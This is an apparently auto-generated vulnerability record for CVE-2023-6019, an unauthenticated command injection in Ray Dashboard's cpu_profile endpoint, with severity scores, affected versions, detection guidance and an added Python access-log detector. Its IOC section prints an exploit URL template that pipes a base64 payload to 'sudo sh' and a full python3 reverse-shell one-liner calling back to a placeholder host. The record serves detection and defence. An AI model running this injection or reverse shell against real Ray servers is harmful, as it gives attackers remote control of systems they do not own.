CVE-2023-6019
published 2023-11-16


Priority: P183 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 74.63% (99.4th percentile)
A command injection existed in Ray's cpu_profile URL parameter, allowing attackers to execute OS commands on the system running the Ray Dashboard remotely, without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

Affected (2 ranges)

Vendor        Product           Version range          Fixed in
anyscale      ray               >= 0, < 2.8.1          2.8.1
ray-project   ray-project_ray   unspecified – latest

Detection & IOCs (extracted from sources)

URL: /worker/cpu_profile?pid=3354&ip=<ip>&duration=5&native=0&format=`echo <b64_payload> |base64$IFS-d|sudo%20sh`
Path: /worker/cpu_profile
Command: python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<lhost>,<lport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
  • Monitor HTTP GET requests to the Ray Dashboard endpoint /worker/cpu_profile containing backtick characters or shell metacharacters (e.g., $IFS, base64, sudo) in the `format` query parameter, which indicates command injection exploitation.
  • The exploit encodes the reverse shell payload in base64 and injects it via the `format` parameter using backtick command substitution and $IFS to bypass space filtering; detect base64-encoded strings in the `format` URL parameter of requests to /worker/cpu_profile.
  • Detect unauthenticated GET requests to the Ray Dashboard (default port 8265) targeting /worker/cpu_profile; the endpoint requires no authentication and is directly exploitable remotely.
  • Hunt for reverse shell patterns spawned from the Ray Dashboard process, specifically python3 socket-based reverse shells using pty.spawn('/bin/bash'), as this is the payload delivered after exploitation.
  • The Ray Dashboard binds to 0.0.0.0 by default, exposing it publicly if not restricted by firewall rules; Anyscale's own guidance recommends operating Ray within a strictly controlled network environment.
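Detection logic for the bullets above, as an added example that is not part of the cvebase record or the Ray project: it parses constructed Combined Log Format access lines (as a reverse proxy in front of the Ray Dashboard would write them) and flags requests to /worker/cpu_profile whose `format` parameter carries shell metacharacters or a base64-like blob. The allowlist of legitimate format values (flamegraph, speedscope, raw) is an assumption about the py-spy output formats the endpoint accepts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format); not real traffic.
# The third line mimics the injection shape from the IOC URL with a harmless blob.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Nov/2023:10:01:02 +0000] "GET /worker/cpu_profile?pid=4242&ip=10.0.0.7&duration=5&native=0&format=flamegraph HTTP/1.1" 200 5120
10.0.0.9 - - [17/Nov/2023:10:01:09 +0000] "GET /api/jobs HTTP/1.1" 200 812
203.0.113.4 - - [17/Nov/2023:10:02:31 +0000] "GET /worker/cpu_profile?pid=3354&ip=10.0.0.7&duration=5&native=0&format=%60echo%20QUJDREVGR0hJSktMTU4%3D%20%7Cbase64%24IFS-d%7Csudo%20sh%60 HTTP/1.1" 200 77
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Backtick/$ (covers $IFS)/pipe/semicolon plus the tokens named in the detection guidance.
SHELL_TOKENS = re.compile(r'[`$|;&]|\bbase64\b|\bsudo\b|\bsh\b', re.IGNORECASE)
BASE64_BLOB = re.compile(r'[A-Za-z0-9+/]{12,}={0,2}')
# Assumed allowlist of legitimate py-spy output formats for this endpoint.
KNOWN_FORMATS = {"flamegraph", "speedscope", "raw"}


def inspect_request(target: str) -> list[str]:
    """Return the reasons a request target looks like CVE-2023-6019 exploitation (empty if clean)."""
    parts = urlsplit(target)
    if parts.path != "/worker/cpu_profile":
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values once
    reasons = []
    for value in params.get("format", []):
        if value not in KNOWN_FORMATS:
            reasons.append(f"format not in allowlist: {value!r}")
        if SHELL_TOKENS.search(value):
            reasons.append("shell metacharacters in format")
        if BASE64_BLOB.search(value):
            reasons.append("base64-like blob in format")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one alert dict per suspicious cpu_profile request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["target"])
        if reasons:
            alerts.append({"src": m["src"], "ts": m["ts"], "target": m["target"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["src"], "->", "; ".join(alert["reasons"]))
```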

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat: 9.8 CRITICAL